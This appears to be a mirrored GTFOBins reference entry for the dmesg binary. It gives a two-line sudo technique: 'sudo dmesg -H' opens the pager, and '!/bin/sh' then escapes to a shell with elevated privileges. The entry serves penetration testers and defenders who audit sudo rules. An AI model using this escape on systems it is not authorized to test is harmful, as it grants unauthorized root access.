mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 22:40:10 +01:00
10 lines
205 B
Markdown
10 lines
205 B
Markdown
|
---
|
||
|
description: |
|
||
|
This invokes the default pager, which is likely to be [`less`](/gtfobins/less/), other functions may apply.
|
||
|
functions:
|
||
|
sudo:
|
||
|
- code: |
|
||
|
sudo dmesg -H
|
||
|
!/bin/sh
|
||
|
---
|